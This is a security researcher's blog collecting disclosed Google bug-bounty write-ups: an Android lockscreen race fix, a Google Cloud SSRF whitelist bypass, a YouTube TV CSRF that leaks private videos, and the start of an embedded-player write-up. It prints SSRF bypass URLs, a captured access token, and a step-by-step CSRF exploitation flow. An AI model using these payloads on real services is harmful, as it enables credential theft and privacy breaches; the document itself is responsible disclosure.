Seems like, on Android, there is a concept of a “security screen”. A security screen can be multiple things. The PIN entry screen, the fingerprint scanning screen, the password entry screen, or, in our case the SIM PIN and SIM PUK entry screen.

These security screens can be stacked “on top” of each other. So for example when the phone was locked, and the SIM PIN entry was visible, it had a SIM PIN security screen on top of a “fingerprint security screen”.

When the SIM PUK was reset successfully, a .dismiss() function was called by the PUK resetting component on the “security screen stack”, causing the device to dismiss the current one and show the security screen that was “under” it in the stack. In our example that was the fingerprint security screen.

Since the .dismiss() function simply dismissed the current security screen, it was vulnerable to race conditions. Imagine what would have happened if something in the background would have changed the current security screen before the PUK resetting component got to the .dismiss() call? Would the PUK component dismiss an unrelated security screen when it finally calls .dismiss()?

This seems like exactly what happened. Some other part of the system was monitoring the state of the SIM in the background, and when it detected a change, it updated which security screen was currently active. It seems like this background component set the normal e.g. fingerprint screen as the active security screen, even before the PUK component was able to get to its own .dismiss() function call. By the time the PUK component called .dismiss() function, it actually dismissed the fingerprint security screen, instead of just dismissing the PUK security screen, as it was originally intended. And calling .dismiss() on the fingerprint security screen caused the phone to unlock.

The Android engineers seemingly decided to refactor the .dismiss() function and made it require an additional parameter, where the caller can specify what type of security screen it wants to dismiss. In our case, the PUK component now explicitly calls .dismiss(SecurityMode.SimPuk), to only dismiss security screens with the type of SimPuk. If the currently active security screen is not a SimPuk screen (because maybe some background component changed it, like in our case), the dismiss function doesn’t do anything.

This seems to me like a pretty elegant and robust solution to defend against this, and future race conditions as well. I was not expecting to cause this big of a code change in Android with this bug.

Fixing the Unfixable: Story of a Google Cloud SSRF

31 December 2021 at 11:00

The post you are reading right now is the write-up I am nominating for the 2021 GCP VRP Prize. The deadline is Dec. 31, 2021. Yeah. While the bug itself might arguably be underwhelming for such a competition, what came after reporting the issue could be valuable for both us, the researchers, and the developers fixing the bugs we find. As always, you can find the raw, straight-to-the-point bug report this post is based on, at feed.bugs.xdavidhu.me.

If you’d rather watch than read, I have made a detailed, one and a half-hour long deep-dive YouTube video where I react to the screen recordings of myself finding and exploiting this bug:

Link to the YouTube video

Chapter 1:
the proxy

While looking for interesting Google APIs, preferably which are internally used by Google, I stumbled upon jobs.googleapis.com. At first sight, it seemed like some private API that could be used by Google to manage their own job listings. As it turned out, jobs.googleapis.com was a Google Cloud product that, among all of the other Cloud products, Google sells to customers. They call it the “Cloud Talent Solution” API. It is an API mainly for companies building job searching websites, helping to better search their available job listings. Google’s own careers.google.com seem to be built on something very similar to this API.

While I was trying to figure this out, I found the product page for this API. Every GCP product has its own product page. These pages give a summary of what the given product is for, showcase their key features, and sometimes they even give some interactive demos.

Interactive demos? 🤔

Yes. This was the demo on the “Cloud Talent Solution” product page:

Short screen recording of the Jobs API's interactive demo

It is showing the features of the jobs API by making some hardcoded job search requests in real-time. But how does it do it?

Looking at the HTTP requests the page was making, the demo was not loading data directly from the jobs API, but from a proxy on the domain cxl-services.appspot.com:

POST /proxy?url=https%3A%2F%2Fjobs.googleapis.com%2Fv4%2Fprojects%2F4808913407%2Ftenants%2F%0A++++++ff8c4578-8000-0000-0000-00011ea231ff%2Fjobs%3Asearch HTTP/1.1
Host: cxl-services.appspot.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Content-Type: application/json; charset=utf-8
Content-Length: 102
Connection: close

{"jobQuery":{"query":"bartendar","queryLanguageCode":"en"},"jobView":"JOB_VIEW_SMALL","maxPageSize":5}

It was a Google App Engine app (because of the .appspot.com ending) which somehow proxied these requests to the real jobs API, and returned the response. This was needed because normally you’d need some kind of authentication to call the jobs API, which this proxy was adding onto the request before forwarding it:

Diagram showing cxl-services adding some kind of authentication to the request

You might wonder, why couldn’t they just hardcode some credentials for the API into the demo, and call jobs directly? Most probably this is for abuse protection since the cxl-services proxy this way can enforce rate limiting and other defenses. Providing the credentials, among other things, would allow someone to abuse them by calling the API without any limits.

With all of that said, how could we attack it? Let’s take a closer look at the URL:

https://cxl-services.appspot.com/proxy?url=https://jobs.googleapis.com/v4/projects/4808913407/tenants/ff8c4578-8000-0000-0000-00011ea231ff/jobs:search

The /proxy endpoint is expecting a url parameter, which in this case is the URL of the jobs API. This kind of behavior is a warning sign signaling that this service might be vulnerable to Server-side Request Forgery (SSRF). Essentially, SSRF happens when we as an attacker can make an application send out requests to any URL we specify. This bug is a great example of how a vulnerability like this can be exploited.

Let’s first try something simple. Can we really just proxy a request to any URL? I started a webserver on my $5 VPS, and set its URL as the url parameter to cxl-services:

Pointing the URL to my webserver

No, it’s not that easy. cxl-services employs some kind of whitelist, only allowing specific URLs to be proxied, like the jobs API.

Some additional boring details about cxl-services: It’s not just for the jobs API. As far as I know, all of the interactive product page demos proxy requests through cxl-services. Because of this, it allows proxying multiple different URLs. I have crossed paths with cxl-services before this research as well, but I wasn’t ever able to break the whitelist.

Let’s look at an example of which URLs are allowed and which are denied by cxl-services:

https://sfmnev.vps.xdavidhu.me/ - ❌
https://xdavid.googleapis.com/ - ❌
https://jobs.googleapis.com/ - ✅
https://jobs.googleapis.com/any/path - ✅
http://jobs.googleapis.com/any/path - ✅
https://jobs.googleapis.com:443/any/path - ✅
https://jobs.googleapis.comx:443/any/path - ❌
https://texttospeech.googleapis.com/xdavid - ✅ 

As you can see, if the hostname (domain name) of the URL is trusted, like jobs.googleapis.com, the proxy allows it no matter what the other parts of the URL are. This implies that cxl-services is doing some kind of dynamic URL parsing where it extracts the hostname of the URL, validates it with the allow list, and if all of that succeeds, proxies the request to the initially provided URL.

Speaking of warning signs, this is also one of them. Parsing a URL is hard.

Now the question is, can we trick the URL parser into thinking that the hostname is a whitelisted domain while making it send the request to a different host, like to our server? If both the whitelist validation logic and the request sending logic are parsing the attacker-provided URL separately, we might be able to exploit some slight differences in them.

After playing around with the /proxy endpoint by sending multiple requests trying to break the whitelist, I tried using the backslash-trick from my previous writeup titled “The unexpected Google wide domain check bypass”.

In short, the backslash-trick relies on exploiting a minor difference between two “URL” specifications: the WHATWG URL Standard, and RFC3986. RFC3986 is a generic, multi-purpose specification for the syntax of Uniform Resource Identifiers, while the WHATWG URL Standard is specifically aimed at the Web, and at URLs (which are a subset of URIs). Modern browsers implement the WHATWG URL Standard.

Both of them describe a way of parsing URI/URLs, with one slight difference. The WHATWG specification describes one extra character, the \, which behaves just like /: ends the hostname & authority and starts the path of the URL.

The two specifications parsing the same URL differently

So I tried using the backslash-trick on cxl-services as well, hoping that the whitelist validator and the actual request sending logic might parse the same URL differently:

request:

GET /proxy?url=https://sfmnev.vps.xdavidhu.me\@jobs.googleapis.com/ HTTP/1.1
Host: cxl-services.appspot.com

response:

HTTP/1.1 200 OK
Cache-Control: no-cache
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
X-Cloud-Trace-Context: fa8cf39a9e7d74e14772efe215f180c1
Date: Mon, 23 Mar 2020 21:28:07 GMT
Server: Google Frontend
Content-Length: 35

Hello from xdavidhu's webserver! :)

It worked! cxl-services thought that the URL is trusted, sent a request to my webserver, and forwarded the response back to me. The whitelist validator of cxl-services parsed the URL most probably using the RFC3986 instructions and thought that everything before the @ is the userinfo section of the URL. After that, when the request was being sent, the HTTP library’s URL parser noticed that because the \ in the WHATWG specification ends the hostname & authority, the host it needs to send the request to is sfmnev.vps.xdavidhu.me:

The two URL parsers in cxl-services parsing the exploit URL

And here comes the interesting part, what was in the request arriving at my webserver? As we already discussed, cxl-services had to somehow authenticate to the jobs API to be able to proxy the product page demo requests to it.

Setting my simple Python HTTPS server into --verbose mode, and making cxl-services request it once again allowed me to see the whole request going to my webserver, including all of the headers:

xdavid@scannr:~/webserver$ sudo httpsserver --verbose
[verbose] Verbose mode enabled.
[+] Starting server. URL: https://sfmnev.vps.xdavidhu.me/


[verbose]
('35.187.132.128', 44083)
[I] Reverse DNS failed. 

Host: sfmnev.vps.xdavidhu.me
content-type: application/json
authorization: Bearer ya29.c.KnT2B01b-kebLicHqMkilaSXkJCfy2R5EouzglkdlZUeBWRBW(GNaGILMgosUyDOSxSAp0AGTqC10692v_K6_B39nlezaV5ntV3MdJ-ZcipXA3zt1CpbgkANgNRFrshzCqzc9Vy_AimSdan8F-ZngZec081 
X-Cloud-Trace-Context: 5989e540147Sof691f39a0183161639/7393502370317147947
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Python-httplib2/0.14.0 (gzip) AppEngine-Google; (http://code.google.com/appengine; appid: s~cxl-services)
Accept-Encoding: gzip,deflate,br

35.187.132.128 - - [22/Mar/2021 17:23:29] code 404, message File not found
35.187.132.128 - - [22/Mar/2021 17:23:29] "GET /@jobs.googleapis.com/ HTTP/1.1" 404 -

Oh, there is something! cxl-services is setting the authorization header to an access token on every outgoing request to authenticate to the jobs and other APIs. Since we tricked the whitelist, now it also sent an access token to our malicious web server.

What can we use this access token for?

Chapter 2:
what did we steal?

The token that we stole was an OAuth 2.0 access token with the identity of (most probably) the cxl-services App Engine service account. With that token, we could call Google Cloud APIs in the name of, and with all of the privileges of cxl-services.

We might wonder, does this token/identity have access to some GCP resources (VMs, storage buckets, etc.) other than the jobs API? In the Amazon AWS universe, we would have a much easier time here. Unfortunately in Google Cloud, you can’t ask the question “what do I have access to?”. You can only go to resources one-by-one, and ask “do I have access to this?. Dylan Ayrey and Allison Donovan have made an awesome talk about this behavior.

Because of this, the best I could do was to start “brute-forcing” and call different APIs with the stolen access token to see if I had access to any resources.

A warning: Be careful and document your actions if you decide on using stolen credentials. There is a line in bug bounties which we shouldn’t cross. I could have reported the issue as-is, but I wanted to look around to prove that getting access to this identity is indeed impactful. I asked for permission from the Google team before performing any data-modifying actions.

Calling the projects.list method of the Resource Manager API, I found 4 GCP projects that this identity had some level of access to:

  • docai-demo
  • cxl-services (where the proxy was running)
  • garage-staging
  • p-jobs

Listing the Compute Engine VMs, I found two machines on the docai-demo project. It looked like they were part of a Google Kubernetes Engine cluster:

  • gke-cluster-1-default-pool-af71d616-j454 (35.193.88.22)
  • gke-cluster-1-default-pool-af71d616-stj9 (35.223.244.119)

Looking at the cxl-services project, in which our target proxy was running in, I found:

  • A Cloud Storage bucket called cxl-services.appspot.com, which had hourly log files of all of the requests the cxl-services App Engine app has ever received, since 2017-10-18 up until today! These files could have contained some sensitive data of users interacting with the product page demos.
  • Some interesting internal details such as file paths from Google’s internal code mono-repository, google3, by listing the versions of the App Engine app: google3/cloud/ux/services/services/proxy.py
  • Another bucket called us.artifacts.cxl-services.appspot.com, used by App Engine, which included container images of the cxl-services proxy. These images could have been reversed to get access to the source code.

Last but not least, I wrote a very simple web application using Python and Flask, which returned a base64 encoded string saying POC by xdavidhu!. After some struggle & panicking, I managed to deploy this little application as a new App Engine service on cxl-services.appspot.com, demonstrating that I have full code execution access to the App Engine app. An RCE, if you will :)

This new service was invokable using the URL https://vrp-poc-dot-cxl-services.appspot.com/. After deploying the code, I opened it in a browser and saw:

My code executing on the cxl-services App Engine app

It was my code, running in an internal Google Cloud project’s App Engine app! At this point, I reported all of my findings and stopped exploring further. You can see more details of the exploitation and my weird reactions in the YouTube video I have previously mentioned.

The Google VRP panel rewarded this issue with a bounty of $3133.70 + a $1000 bonus for “the well written report and documenting lateral movement”.

Chapter 3:
bypassing the bypass

Since I had a 90-day public disclosure deadline on my report a few days before the disclosure date, I started preparing the feed post and the YouTube video. Looking at the issue report, I wanted to test the fix.

Google has indeed fixed the issue from the original report, in which I used the \@ characters to construct a URL that bypasses the whitelist, such as:

https://[your_domain]\@jobs.googleapis.com

But playing around with the parser for a few minutes and putting random characters in the URL, I found something.

If I put any character(s) in between the \ and the @, I was able to bypass the whitelist, once again:

https://sfmnev.vps.xdavidhu.me\anything@jobs.googleapis.com/

Finding this was literally just a few minutes of playing with the proxy, and it resulted in getting the original bug bounty reward amount, once again. It was quite insane. So, check your fixes!

(psst: on Google VRP, you don’t have to wait until your issue moves into fixed status. if you find that the code has changed, but you can still exploit it, write a comment on the original ticket and you might get another reward!)

Well, the story ends here, right? No. This story never ends.

After Google fixed the bypass and I disclosed the bug, I still had my YouTube video planned. I had hours of unedited screen recordings on my computer. In April, I opened them up in Final Cut and started cutting them together.

In the recordings, when I listed the versions of the cxl-services App Engine app, there were multiple results, each of them indicating a specific version of the proxy:

The results of listing the App Engine app's versions

I remembered that in App Engine, using a specific URL we can invoke any version of any service we want:

https://VERSION-dot-SERVICE-dot-cxl-services.appspot.com

I thought that to fix the issue, the product team must have pushed out a new version to the default service (which was the proxy). But did they leave the old versions there? I tried calling the old b347699687-dev-gokulr version (which I got from the screen recording) of the default service, using the original \@ whitelist bypass:

https://b347699687-dev-gokulr-dot-default-dot-cxl-services.appspot.com/proxy?url=https://sfmnev.vps.xdavidhu.me\@jobs.googleapis.com/

And indeed, it worked! My web server received a request with an access token in the authorization header. It was still exploitable! Even though the proxy version I called was old, it worked the same way. It still generated an access token, and most importantly, it didn’t have the original vulnerability patched yet.

Once again, the Google VRP panel rewarded this second bypass as well. So, check your fixes.. of your fixes!

Will you be the one to bypass it for the 3rd time and get $3133.7?

I Built a TV That Plays All of Your Private YouTube Videos

5 April 2021 at 11:00

In my previous two YouTube writeups, we were limited by having to know the victim’s private video IDs to do anything with them. Let’s be honest, that’s a bit hard to exploit in the real world. Thankfully, I found another bug that solves this problem once and for all. Allow me to present a real, one-click steal-all bug to you. This one actually kicks-ass. At least I like to think that.

Prefer to read the raw technical report I’ve sent to Google instead of the story? You can find it here!

It all started years ago. We were at a friend’s place and were flying tiny little FPV drones. After draining all of the miniature drone batteries, I wanted to show them an old personal video from my YouTube account. They had a Smart TV. I opened the YouTube app on my phone, selected my private video, and it gave me the option to play it on the TV. I thought why not, let’s do that, so we watched my private video on the TV without problems. But this planted an idea in my head that stayed there for years. My question was very simple:

How the hell did the TV play my private video?

I was not signed into the TV. And only I can watch my private videos right? Did it somehow log the TV into my account temporarily? But then could the TV access all of my other private videos as well? I hope not?

A few years later, in 2020, I crossed paths again with a fellow LG smart TV. I remembered my question about the private videos, and now as I was actively working on Google VRP and YouTube, I decided to investigate.

OK, so a good starting point would be to look inside the YouTube for Android TV App. That’s probably a huge and complex Android application that would take forever to reverse-engineer right? Wrong. Turns out, it’s just a website. Looking back, I was such a boomer to expect anything else. Nowadays even your toothbrush is running a WebView.

After looking into the decompiled APK, I found that it simply loads https://www.youtube.com/tv into some kind of weird WebView like browser, which is called Cobalt. Fair enough, that’s good news. We can just open https://www.youtube.com/tv in the browser, and start testing. So I opened the page:

The YouTube TV page redirecting me back to the desktop site

But wait! I don’t want to be redirected! Show me YouTube TV!

There must be a way by which YouTube decides if I am a TV or not. After finding no other option, I thought it must check the User-Agent header, so I tried modifying it:

// change ‘Firefox’ to ‘Cobalt’ in the User-Agent
“User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0”
->
“User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Cobalt/87.0”

Changing Firefox to Cobalt in the initial request worked, and the request returned the full YouTube TV app, instead of the “You are being directed to youtube.com” screen:

The YouTube TV page, loaded successfully in Firefox

Boom! Awesome, we are a TV now and can start testing!

This is where writing this blog post gets a bit difficult. The feature I used to test this has been fully removed from the desktop YouTube site after my bug report. (coincidence? 👀) At the time I didn’t really document my research with screenshots (lesson learned), so unfortunately I will have to rely on public pictures / my memory to tell you about this feature.

So I wanted to see how this “remote-control” works. At the time, you were able to control a TV via the desktop YouTube site as well (https://www.youtube.com/), even if you were on a different network than the TV. I used this for testing, but this is the feature that got removed. (From the UI.)

To link a TV, you would have to enter its TV code. So on my “TV”, I generated a TV code…

The YouTube TV "Link with TV code" settings page, showing the TV Code PIN

And entered that TV code in my other browser, on https://youtube.com/pair:

The old, now removed pairing page on the desktop YouTube site src: wikiHow

After linking a TV, if you opened a video, a little Play on TV icon appeared on the right side of the player, which if pressed, transferred the video onto the TV:

The old, "Play on TV" button on the desktop YouTube site src: www.technipages.com

And guess what, it even worked with private videos! I finally had all the tools to get to the bottom of this.

The internal API that provided this remote control capability was called Lounge API. The pairing process looked like this:

  1. The TV requests a screen_id from /pairing/generate_screen_id
  2. Using the screen_id, the TV again requests a lounge_token from /pairing/get_lounge_token_batch
  3. With the lounge_token, the TV requests a pairing PIN from /pairing/get_pairing_code
  4. The TV displays the pairing PIN

After this, the user has to enter the pairing PIN on their device. With the PIN, the user’s device calls /pairing/get_screen, and if the user entered a correct PIN, the Lounge API returns a lounge_token for the user as well. After this, the pairing is over. The user can now control the TV using the lounge_token it just obtained.

Interested in how the pairing process looks like on a local network where you don’t have to enter a TV code? I tested it with a Samsung TV and here is what I found.

After starting the pairing process, the TV switches into a “polling” mode, which is quite a common thing at Google. Instead of WebSockets, Google usually uses these bind requests, which are basically HTTP requests that take very long if there are no new events, but return immediately if there are some. And the TV calls this /bind endpoint over and over.

This HTTP polling might seem weird for you, even if you are a web developer. Here is an example:

A diagram explaining how the Google-wide "bind" requests work

As you can see, the TV sends a request to the /bind endpoint, asking if there are any new events. Since there are no events at the moment, the Loung API doesn’t yet respond and keeps the HTTP request waiting. For the TV it looks like the request is still loading. But, as soon as the user sends a new command request to the Lounge API, the API returns the HTTP request to the TV with the new event. After this, the TV sends the /bind request again and waits for new commands. This gives the “real-time remote control” feeling, but without WebSockets. (Of course, if there are no events at all, the /bind requests still return with an empty body after a while, to prevent the requests from timing out.)

“But you still didn’t tell me how it plays the private videos!! I didn’t come here to read about WebSocket alternatives.” - You might be thinking. And you are right. Here it goes. Get ready for the epic answer to the mystery that kept me up at night for years:

It uses an extra video-specific token, called ctt.

Eh. Hope I didn’t hype that up too much.

So, when the user requests to play a private video, the event the TV receives from the /bind endpoint includes an extra ctt parameter next to the videoId. When playing the video, the TV then requests the raw video URL from the /get_video_info endpoint and includes the ctt token as a GET parameter named vtt (for some reason). Without the ctt token, the TV can’t watch the private video.

This ctt token only gives permission to watch that specific video, so my fear I mentioned at the start of the blog post (that the TV can access my other private videos) is not true. But if you find a bug that makes it possible, make sure to write a blog post about it!

So, what’s the bug?

Now that you understand how this real-time remote control magic works, let’s see what the actual bug was.

While playing with this API, I was looking at the logs in Burp, my HTTP proxy of choice. More specifically I was looking for the one specific request that the browser made, which actually started playing the video on the TV. There were a bunch of requests, so it felt a little bit like finding the needle in the haystack, but eventually, I found the one that triggered the event. I was able to repeat it with Burp, and start the video manually over and over on the TV, just by sending one request.

It was a POST request to the /bind endpoint. It had a crazy amount of parameters. 90% of which was not required for it to play the video on the TV.

While trying to make sense of this request and its insane amount of parameters, I noticed that something was missing… I didn’t seem to find any CSRF tokens anywhere. Not in the GET parameters, not in the headers, nowhere.

(Are you unsure about how a Cross-Site Request Forgery attack looks like? Watch this video by PwnFunction before continuing!)

I thought “hmm, that’s weird. It has to have some CSRF protection. I’m probably just missing something”. I tried removing more and more unnecessary parameters, and it still played the video on the TV. At one point, the only long and unpredictable parameter in the request was the lounge_token and it still played the video on the TV. Still, I thought I have to be I’m missing something. So I made an HTML page with a simple form that made a POST to the Lounge API to simulate a CSRF attack.

I opened my little demo CSRF POC page and clicked the “submit” button to send the form, and the video started playing on the TV! BOOM! At this point I finally accepted that this endpoint really doesn’t have any CSRF protection!

So the /bind endpoint doesn’t have CSRF protection. What does this mean?

It means that we can play videos in the name of the victim if she visits our website! We just need to specify the lounge_token in the POST request, and the ID of the video to play, and send the request in the name of the victim, from our malicious site.

Since we are making the play request in the name of the victim, if we specify a victim’s private video to play, the TV targeted by the lounge_token will receive a ctt token for it, which will give the TV access to the private video…

This is what the video playing request without any CSRF protection (and without all of its unnecessary parameters) looked like:

An image showing the CSRF vulnerable "bind" HTTP request

Don’t worry if you don’t know what some of these parameters mean. I don’t know it either. And it had like 10x more originally.

“But wait! How do we know what TVs the victim used before? How do we get a lounge_token? This can’t be exploited, right?” - You might ask.

Actually, it can be exploited. What if I told you, that we can build our own TV?

Image this attack scenario: We “make our own TV”, get a lounge_token for it, and then make a request in the name of the victim to play the victim’s private video on our “TV”. After this, we poll the /bind endpoint with our “TV”, waiting for new play events, and when we get it, we will also get the ctt for the victim’s private video, so we can watch it! That’s not bad!

To exploit this, we don’t have to use the actual YouTube TV site, it’s enough to extract the essentials from it, and build a little script that behaves like a “barebones TV”. So that it can generate a lounge_token for itself, and poll the /bind endpoint for new play events.

If you are waiting for the “pin pairing” steps, we can actually skip those completely by just using the lounge_token returned to the TV from the initial /pairing/get_lounge_token_batch request.

But we are hitting the same exact wall that we hit in both of my previous writeups! How do we know the victim’s private video IDs? In the beginning, I told you that this bug will have a solution for this problem. And indeed it has!

The magic here is that we can not only play videos, but we can even play playlists on the TV using this vulnerable request!

By changing the videoId to listID in the POST request, we can specify a playlist to play on the TV, rather than a video:

An image showing the CSRF vulnerable "bind" HTTP request, but now specifying a playlist to play, instead of a video

When specifying a playlist like this in the POST request, the TV will get a play event from the Lounge API with a list of video ID-s that the given playlist contains.

But what playlist should we play in the name of the victim?

In my previous YouTube writeup, I talked about the special Uploads playlist. It’s special because if the channel owner views that playlist, he/she can see all of her Public, Unlisted and Private videos in it. But if a different user views the same playlist, she can only see the Public videos in it.

The ID of this special Uploads playlist for a given channel ID can be found easily:

// just have to change the second char of the channel ID 
// from ‘C’ -> `U` to get the ID of the special “Uploads” playlist

“UCBvX9uEO0a3fZNCK12MAgug” -> ”UUBvX9uEO0a3fZNCK12MAgug”

The channel ID is public for every YouTube channel, most of the time it can be found by simply navigating to the channel’s page on YouTube, and checking the URL:

https://www.youtube.com/channel/[channel_id]

So, if using our CSRF vulnerable POST request, we play the victim’s special Uploads playlist in the name of the victim on our malicious TV, our malicious TV will get all of the victim’s Public, Unlisted and Private video IDs!

And we already know how we can steal the ctt for a private video if we know its ID.

So, to sum it all up, we could make an absolutely ridiculously epic POC which steals literally everything from the victim, by performing these simple steps:

  1. Set up a malicious page specifically for the victim by hardcoding her channel ID, and make the victim open it in her browser
  2. With our malicious page, make the victim play her Uploads playlist on our evil TV
  3. With our evil TV, listen for the play event and note the victim’s video IDs (including Unlisted & Private video IDs)
  4. With our evil TV, tell our malicious page to play all of the Private video IDs one by one on our TV, so we can steal all of the ctts from the play events our TV gets
  5. Profit!!!

Here is diagram of this high-level attack flow:

A diagram explaining the above mentioned attack flow visually

That’s it! We have stolen all Unlisted and all Private videos of the victim! Now we’re talking!

(actually, we could also steal the contents of private playlists, liked videos, and the watch later playlist with the same trick. but that’s not that exciting.)

This bug was a bit complicated to exploit, so I made an extremely overengineered POC script, which performs this attack automatically. This is how it looked like in action, stealing all Private & Unlisted videos of a victim:

The POC had two components, a backend webserver which also acted as the evil TV, and a frontend which was running in the victim’s browser, talking with the backend. It’s perfectly fine if you don’t exactly understand how the script worked under the hood, I might have made a little bit of a mess (but you are welcome to look at all of the source code if you are interested!). Here is a more (or less) fun, higher-level description of the POC flow (that I have sent to Google):

  1. POC starts a Flask webserver to serve the victim opening the malicious page. Let’s call the POC Python script backend.
  2. The victim opens the malicious webpage. Let’s call the victim’s page frontend.
  3. The backend requests the attacker to enter the victim’s channel ID.
  4. The channel ID’s second character is changed to a U. The resulting string is the ID of the victim’s Uploads playlist, which contains all Private and Unlisted uploads. Only the owner can see the Private and Unlisted videos in this playlist. Other users only see the Public video IDs.
  5. The POC sets up a fake TV and starts to poll the events for it.
  6. The frontend is instructed to execute the CSRF request and play the playlist generated in Step 4. on the malicious TV.
  7. When the CSRF request is sent by the frontend, the backend receives the TV play event, containing the IDs of all of the victim’s videos, including Private and Unlisted video IDs.
  8. The backend queries the YouTube Data API with all of the obtained video IDs to find out which videos are Private or Unlisted.
  9. The Unlisted videos are ready, the backend prints its IDs out for the attacker. The Unlisted videos only require knowing the video ID to watch.
  10. The backend instructs the frontend to play the victim’s Private videos on the malicious TV one by one. For every video, the backend sets up a new malicious TV, tells the frontend to play the specific video, listens for play events, and receives the event for the TV with a special ctt parameter. Using the ctt, the backend queries the get_video_info YouTube endpoint for the specific Private video, authenticates itself with the ctt, and greps the Private video’s title and direct video URL from the response.
  11. After every Private video is played by the frontend, the backend prints the details of all of the obtained Private videos for the attacker.
  12. The POC script is done.

Once again, you can find the source code of the POC files here.

The fix:

YouTube fixed this issue in a quite simple, but effective way. They removed the whole feature. :D

No, actually, what they did is that this /bind endpoint now requires an Authorization header with an OAuth Bearer token to be authenticated, so the mobile apps and such can still use it without issues. But when requested with cookies only (like in our CSRF attack), it behaves like an anonymous request, without any authentication. Thus, it’s not possible to play videos/playlists in the name of a victim anymore.

Hey, you read the whole thing!
I made an experimental Google Form to get a little feedback about you & your experience reading this writeup. If you’d like, you can fill it out here.

Timeline:

[Jul 24, 2020] - Bug reported
[Jul 24, 2020] - Initial triage (P3/S4)
[Jul 29, 2020] - Bug accepted (P1/S1)
[Aug 04, 2020] - Reward of $6000 issued
[??? ??, 2020] - Bug fixed

The Embedded YouTube Player Told Me What You Were Watching (and more)

18 January 2021 at 11:00

2019, October 11, 00:16:
I finish the cold frozen pizza that I made hours before but forgot to eat, finally write the report, press submit on the Google security bug submission form, and see the classic, Thanks! We received your report. message. That feeling is hard to beat.

I just submitted a bug, using which, I could simply send a link to someone, and when they click on it and visit my website, I could steal their YouTube watch history, the links to watch all of their unlisted videos, their Watch Later playlist, the list of videos they’ve liked, and more. It was pretty damn cool.

How was this possible? Let’s go back in time a little bit.

Already made some progress? Skip ahead to Chapter 2, Chapter 3, or Chapter 4!

Chapter 1:
Your special playlists you never created

This issue requires a little bit of understanding about the inner-workings of YouTube. Most importantly, about these four interesting playlists:

Since YouTube is made up of videos, a bunch of internal stuff in YouTube is made up of playlists. Everybody has a few of them, even if they have never created one. I knew about these from previous research I have done (by previous research, I just mean trying every feature and trying to understand how they work), before finding this bug. Let’s look at these playlists one-by-one because they will be important later.

The Watch History playlist:

At the time of finding this bug, every YouTube user had a playlist with the ID HL, which stands for “History List” (I assume). This list contained every video you previously watched on YouTube.

The Watch Later playlist:

You have probably seen the little clock icon everywhere on YouTube, which when pressed, adds the video to your “Watch Later”. This is also just a special playlist internally, with the ID WL.

The Liked Videos playlist:

This is a tricky one. At the time of finding the bug, I was a bit confused about how this works, so I had to use a little bit of guessing. All I knew, that it was constructed by somehow modifying your channel ID, which is a 24 char long string, and can be found by going to your channel page, and looking at the URL:

"https://www.youtube.com/channel/UCBvX9uEO0a3fZNCK12MAgug"
-> channel_id = "UCBvX9uEO0a3fZNCK12MAgug"

After a bit of trial and error, and by looking at the playlists of my testing/personal accounts, I figured out a way to “guess” the special “Liked Videos” playlist. You just had to replace the first 3 characters of the channel ID with LLD or LLB:

// one of them will be the “Liked Videos” playlist of the given channel
UCBvX9uEO0a3fZNCK12MAgug -> LLDvX9uEO0a3fZNCK12MAgug
UCBvX9uEO0a3fZNCK12MAgug -> LLBvX9uEO0a3fZNCK12MAgug

And finally, the most important, the Uploads playlist:

This special playlist contains all of your videos. It has everything in it, regardless of the video’s privacy setting. So all Public, Unlisted and Private videos you have ever uploaded, are in your special “Uploads” playlist.

At the time of finding the bug, the same guessing thing had to be used as for the “Liked Videos” playlist, but this time first 3 characters of the channel ID had to be UUD or UUB:

// one of them will be the “Uploads” playlist of the given channel
UCBvX9uEO0a3fZNCK12MAgug -> UUDvX9uEO0a3fZNCK12MAgug
UCBvX9uEO0a3fZNCK12MAgug -> UUBvX9uEO0a3fZNCK12MAgug

Or, if you don’t want to do any of that, you can just go to the channel’s page, click the Videos tab, and click Play All. But only if that button is visible, which is unfortunately not always the case.

If you are interested in the details about how these playlists have changed since 2019, and how they work today at the time of writing this post, you can check out this Gist I made.

So now you know about these special playlists every YouTube user has. Now, you might think that we should just open for example someone’s “Uploads” playlist like you would open any other playlist, and simply leak all of their unlisted videos:

// how to steal someone's unlisted videos (very easy!!)

1. Open https://www.youtube.com/playlist?list=[victims-uploads-playlist]
2. Profit!?

Unfortunately, it’s not that easy. These playlists are special in another way too, which is that different users will see different videos in them. If the channel owner opens his/her “Uploads” playlist, she will see all of her videos, regardless of the privacy setting. If an attacker tries to open the victim’s “Uploads” playlist, only the Public videos will be shown, any other Unlisted and Private videos the victim has will just not be there.

As an attacker, we can clearly see that these playlists can contain very sensitive information about the users. We would like to steal these. But unfortunately, they seem to be well protected…

Chapter 2:
The Embedded Player and it’s API

If you have a website and want to have a little YouTube player inside it, there is an app for that. And it’s called the YouTube IFrame Player. Embedding this player into your website is quite easy, you just have to copy some HTML code with an iframe tag, and paste it into your site’s source:

Screenshot of an empty webpage with an embedded YouTube player

But today websites are rarely that simple, so you might wonder, what if I want to dynamically create a YouTube player with JavaScript? What if I want to automatically pause the video? These problems would seem quite hacky, or even impossible in some cases, due to the rules of the Same-origin Policy, and other protections modern browsers provide.

Thankfully, YouTube has a solution for this as well, the YouTube Player API. This API allows you to just add a JS library to your site, and then simply create/modify/control the YouTube players on your site however you’d like, using JavaScript. For example, if you want to pause a video, you can just call player.pauseVideo().

Hm.. This is pretty interesting, but how does it work? The answer might be obvious if you have previously worked with cross-origin (iframe) communication. The YouTube player uses the browser’s PostMessage API, which allows different origins (in our case your site and the YouTube iframe), to send each other little messages over a secure channel. So the YouTube player has a postMessage listener where it listens to commands, and the JS library you put into your site sends messages to it when you want to perform some action, like pausing the video. Actually, the YouTube player is talking a lot, even if you don’t ask it anything. It immediately tells the JS library on your site if anything happens with the player. This makes it possible for your site to add event listeners, which get called when for example the user skips into a currently playing video.

Let’s see a quick example of how this communication works under the hood:

// this postMessage is sent from your site to the iframe under the hood when you call “player.playVideo()”
-> {"event":"command","func":"playVideo","args":[],"id":1,"channel":"widget"}

// the iframe sends a lot of stuff back, here are some examples
